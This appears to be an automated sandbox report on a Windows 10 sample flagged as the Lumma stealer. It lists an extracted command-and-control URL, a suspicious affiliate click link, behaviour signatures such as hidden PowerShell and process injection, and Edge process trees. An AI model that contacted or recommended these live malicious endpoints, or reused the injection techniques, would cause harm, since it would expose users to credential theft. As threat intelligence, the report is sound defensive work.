Resubmissions
15-01-2025 20:48
250115-zlj2asvjbz 1015-01-2025 20:47
250115-zktjcavjas 415-01-2025 20:43
250115-zhyehstrcy 8Analysis
-
max time kernel
142s -
max time network
148s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250113-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
15-01-2025 20:48
Static task
static1
URLScan task
urlscan1
General
Malware Config
Extracted
lumma
https://bikedtwittg.shop/api
Signatures
-
Lumma family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 130 2104 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2104 powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 3420 UnRar.exe 2936 obs-ffmpeg-mux.exe 2456 createdump.exe -
Loads dropped DLL 30 IoCs
pid Process 4204 MsiExec.exe 4204 MsiExec.exe 4204 MsiExec.exe 4204 MsiExec.exe 4204 MsiExec.exe 4204 MsiExec.exe 4204 MsiExec.exe 2936 obs-ffmpeg-mux.exe 2936 obs-ffmpeg-mux.exe 2936 obs-ffmpeg-mux.exe 2936 obs-ffmpeg-mux.exe 2936 obs-ffmpeg-mux.exe 2936 obs-ffmpeg-mux.exe 2936 obs-ffmpeg-mux.exe 2936 obs-ffmpeg-mux.exe 2936 obs-ffmpeg-mux.exe 688 MsiExec.exe 688 MsiExec.exe 688 MsiExec.exe 688 MsiExec.exe 688 MsiExec.exe 688 MsiExec.exe 688 MsiExec.exe 4060 MsiExec.exe 4060 MsiExec.exe 4060 MsiExec.exe 4060 MsiExec.exe 4060 MsiExec.exe 4060 MsiExec.exe 4060 MsiExec.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\P: msiexec.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2936 set thread context of 4112 2936 obs-ffmpeg-mux.exe 134 -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\442a422d-dc8d-479f-b468-0d733e4f44dc.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20250115204837.pma setup.exe -
Drops file in Windows directory 31 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI894E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI89AD.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF25D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF389.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1BC7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI892E.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\SourceHash{22DF44A1-4528-4504-AEF7-E168169A4BCB} msiexec.exe File opened for modification C:\Windows\Installer\MSIFF61.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI88FE.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1C47.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI889F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF1BF.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1BF7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF359.tmp msiexec.exe File created C:\Windows\Installer\e58efed.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI1BB6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1C17.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8A1C.tmp msiexec.exe File opened for modification C:\Windows\Installer\e58efe9.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI89EC.tmp msiexec.exe File created C:\Windows\Installer\e58efe9.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI284E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1BA5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI97C9.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF20E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1B56.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIF037.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF2FA.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings msedge.exe -
Suspicious behavior: EnumeratesProcesses 41 IoCs
pid Process 2628 msedge.exe 2628 msedge.exe 1096 msedge.exe 1096 msedge.exe 3424 identity_helper.exe 3424 identity_helper.exe 736 msedge.exe 736 msedge.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 2104 powershell.exe 2104 powershell.exe 2104 powershell.exe 3916 msedge.exe 3916 msedge.exe 3916 msedge.exe 3916 msedge.exe 2104 powershell.exe 2104 powershell.exe 2104 powershell.exe 2104 powershell.exe 2104 powershell.exe 2104 powershell.exe 2104 powershell.exe 2104 powershell.exe 2104 powershell.exe 2104 powershell.exe 2104 powershell.exe 2104 powershell.exe 2104 powershell.exe 2104 powershell.exe 3732 msedge.exe 3732 msedge.exe 4748 msedge.exe 4748 msedge.exe 1572 identity_helper.exe 1572 identity_helper.exe 1824 msiexec.exe 1824 msiexec.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 20 IoCs
pid Process 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 4748 msedge.exe 4748 msedge.exe 4748 msedge.exe 4748 msedge.exe 4748 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: 33 2384 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2384 AUDIODG.EXE Token: SeRestorePrivilege 4008 7zG.exe Token: 35 4008 7zG.exe Token: SeSecurityPrivilege 4008 7zG.exe Token: SeSecurityPrivilege 4008 7zG.exe Token: SeShutdownPrivilege 1572 msiexec.exe Token: SeIncreaseQuotaPrivilege 1572 msiexec.exe Token: SeSecurityPrivilege 1824 msiexec.exe Token: SeCreateTokenPrivilege 1572 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1572 msiexec.exe Token: SeLockMemoryPrivilege 1572 msiexec.exe Token: SeIncreaseQuotaPrivilege 1572 msiexec.exe Token: SeMachineAccountPrivilege 1572 msiexec.exe Token: SeTcbPrivilege 1572 msiexec.exe Token: SeSecurityPrivilege 1572 msiexec.exe Token: SeTakeOwnershipPrivilege 1572 msiexec.exe Token: SeLoadDriverPrivilege 1572 msiexec.exe Token: SeSystemProfilePrivilege 1572 msiexec.exe Token: SeSystemtimePrivilege 1572 msiexec.exe Token: SeProfSingleProcessPrivilege 1572 msiexec.exe Token: SeIncBasePriorityPrivilege 1572 msiexec.exe Token: SeCreatePagefilePrivilege 1572 msiexec.exe Token: SeCreatePermanentPrivilege 1572 msiexec.exe Token: SeBackupPrivilege 1572 msiexec.exe Token: SeRestorePrivilege 1572 msiexec.exe Token: SeShutdownPrivilege 1572 msiexec.exe Token: SeDebugPrivilege 1572 msiexec.exe Token: SeAuditPrivilege 1572 msiexec.exe Token: SeSystemEnvironmentPrivilege 1572 msiexec.exe Token: SeChangeNotifyPrivilege 1572 msiexec.exe Token: SeRemoteShutdownPrivilege 1572 msiexec.exe Token: SeUndockPrivilege 1572 msiexec.exe Token: SeSyncAgentPrivilege 1572 msiexec.exe Token: SeEnableDelegationPrivilege 1572 msiexec.exe Token: SeManageVolumePrivilege 1572 msiexec.exe Token: SeImpersonatePrivilege 1572 msiexec.exe Token: SeCreateGlobalPrivilege 1572 msiexec.exe Token: SeRestorePrivilege 1824 msiexec.exe Token: SeTakeOwnershipPrivilege 1824 msiexec.exe Token: SeRestorePrivilege 1824 msiexec.exe Token: SeTakeOwnershipPrivilege 1824 msiexec.exe Token: SeRestorePrivilege 1824 msiexec.exe Token: SeTakeOwnershipPrivilege 1824 msiexec.exe Token: SeRestorePrivilege 1824 msiexec.exe Token: SeTakeOwnershipPrivilege 1824 msiexec.exe Token: SeRestorePrivilege 1824 msiexec.exe Token: SeTakeOwnershipPrivilege 1824 msiexec.exe Token: SeRestorePrivilege 1824 msiexec.exe Token: SeTakeOwnershipPrivilege 1824 msiexec.exe Token: SeRestorePrivilege 1824 msiexec.exe Token: SeTakeOwnershipPrivilege 1824 msiexec.exe Token: SeRestorePrivilege 1824 msiexec.exe Token: SeTakeOwnershipPrivilege 1824 msiexec.exe Token: SeRestorePrivilege 1824 msiexec.exe Token: SeTakeOwnershipPrivilege 1824 msiexec.exe Token: SeRestorePrivilege 1824 msiexec.exe Token: SeTakeOwnershipPrivilege 1824 msiexec.exe Token: SeRestorePrivilege 1824 msiexec.exe Token: SeTakeOwnershipPrivilege 1824 msiexec.exe Token: SeRestorePrivilege 1824 msiexec.exe Token: SeTakeOwnershipPrivilege 1824 msiexec.exe Token: SeRestorePrivilege 1824 msiexec.exe Token: SeTakeOwnershipPrivilege 1824 msiexec.exe -
Suspicious use of FindShellTrayWindow 44 IoCs
pid Process 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 4008 7zG.exe 1572 msiexec.exe 1572 msiexec.exe 4728 msiexec.exe 4728 msiexec.exe 4748 msedge.exe 4748 msedge.exe 4664 msiexec.exe 4664 msiexec.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe 1096 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1096 wrote to memory of 2292 1096 msedge.exe 81 PID 1096 wrote to memory of 2292 1096 msedge.exe 81 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2564 1096 msedge.exe 83 PID 1096 wrote to memory of 2628 1096 msedge.exe 84 PID 1096 wrote to memory of 2628 1096 msedge.exe 84 PID 1096 wrote to memory of 4848 1096 msedge.exe 85 PID 1096 wrote to memory of 4848 1096 msedge.exe 85 PID 1096 wrote to memory of 4848 1096 msedge.exe 85 PID 1096 wrote to memory of 4848 1096 msedge.exe 85 PID 1096 wrote to memory of 4848 1096 msedge.exe 85 PID 1096 wrote to memory of 4848 1096 msedge.exe 85 PID 1096 wrote to memory of 4848 1096 msedge.exe 85 PID 1096 wrote to memory of 4848 1096 msedge.exe 85 PID 1096 wrote to memory of 4848 1096 msedge.exe 85 PID 1096 wrote to memory of 4848 1096 msedge.exe 85 PID 1096 wrote to memory of 4848 1096 msedge.exe 85 PID 1096 wrote to memory of 4848 1096 msedge.exe 85 PID 1096 wrote to memory of 4848 1096 msedge.exe 85 PID 1096 wrote to memory of 4848 1096 msedge.exe 85 PID 1096 wrote to memory of 4848 1096 msedge.exe 85 PID 1096 wrote to memory of 4848 1096 msedge.exe 85 PID 1096 wrote to memory of 4848 1096 msedge.exe 85 PID 1096 wrote to memory of 4848 1096 msedge.exe 85 PID 1096 wrote to memory of 4848 1096 msedge.exe 85 PID 1096 wrote to memory of 4848 1096 msedge.exe 85 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://pinkmedia.o18.click/c?o=21356743&m=2079&a=157764&aff_click_id=499c0dab7fe9d67b58a1471b0c1c12cf&sub_aff_id=175515921⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffba69346f8,0x7ffba6934708,0x7ffba69347182⤵PID:2292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,4284515570054758345,16758330505049439027,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:22⤵PID:2564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,4284515570054758345,16758330505049439027,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,4284515570054758345,16758330505049439027,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:82⤵PID:4848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4284515570054758345,16758330505049439027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3476 /prefetch:12⤵PID:5036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4284515570054758345,16758330505049439027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:12⤵PID:4272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4284515570054758345,16758330505049439027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:12⤵PID:1284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,4284515570054758345,16758330505049439027,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5936 /prefetch:82⤵PID:3588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings2⤵
- Drops file in Program Files directory
PID:1240 -
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff7146b5460,0x7ff7146b5470,0x7ff7146b54803⤵PID:4232
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,4284515570054758345,16758330505049439027,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5936 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4284515570054758345,16758330505049439027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5984 /prefetch:12⤵PID:1780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4284515570054758345,16758330505049439027,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:12⤵PID:4644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4284515570054758345,16758330505049439027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:12⤵PID:2264
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4284515570054758345,16758330505049439027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4320 /prefetch:12⤵PID:3256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4284515570054758345,16758330505049439027,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:12⤵PID:1468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4284515570054758345,16758330505049439027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6752 /prefetch:12⤵PID:2176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4284515570054758345,16758330505049439027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6816 /prefetch:12⤵PID:3576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4284515570054758345,16758330505049439027,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6528 /prefetch:12⤵PID:1200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4284515570054758345,16758330505049439027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6432 /prefetch:12⤵PID:4908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4284515570054758345,16758330505049439027,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6704 /prefetch:12⤵PID:2872
-
-
